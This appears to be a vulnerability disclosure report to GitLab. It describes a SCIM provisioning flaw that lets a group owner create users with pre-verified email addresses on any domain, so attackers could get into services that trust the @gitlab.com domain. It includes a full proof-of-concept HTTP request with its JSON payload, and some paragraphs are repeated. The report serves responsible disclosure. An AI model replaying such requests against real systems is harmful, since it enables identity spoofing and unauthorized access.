Hi, I found the new SCIM provisioning function allows any group owner in gitlab to create any user with verified email address. i.e. I can create user with email address [email protected], and gitlab.com will think [email protected] is verified already.
This will bring problem to the client app that uses Gitlab as Identity Provider, and check if the user’s email domain matches @gitlab.com
, then using this email verification bypass, we can access the service now.
I used to have a list of internal services/sites of gitlab uses gitlab.com to sign in and check if the signed in user has @gitlab.com as their email domain. But I can’t find them any more, I am sure gitlab security team know what are those services. And exposure of those services would bring a high security impact to gitlab infrastructure.
https://gitlab.com/groups/GROUP_PATH/-/saml
and setup the SAML SSO as documentedPOST /api/scim/v2/groups/YOUR_GROUP_NAME/Users HTTP/1.1
Host: gitlab.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/scim+json
Authorization: Bearer YOUR_SCIM_TOKEN
Content-Length: 291
{"externalId":"REPLACE_ME","active":null,"userName":"anyusernamewilldo","emails":[{"primary":true,"type":"work","value":"[email protected]"}],"name":{"formatted":"Test User","familyName":"User","givenName":"Test3"},"schemas":["urn:ietf:params:scim:schemas:core:2.0:User"],"meta":{"resourceType":"User"}}
I used to have a list of internal services/sites of gitlab uses gitlab.com to sign in and check if the signed in user has @gitlab.com as their email domain. But I can’t find them any more, I am sure gitlab security team know what are those services. And exposure of those services would bring a high security impact to gitlab infrastructure.
Check the user username4 on gitlab.com, you will see his email address is [email protected] and verified.
Email is verified without going through the verification process
Email should not be verified using this method
{F484033}
This bug happens on GitLab.com
This bug happens on GitLab.com)
see above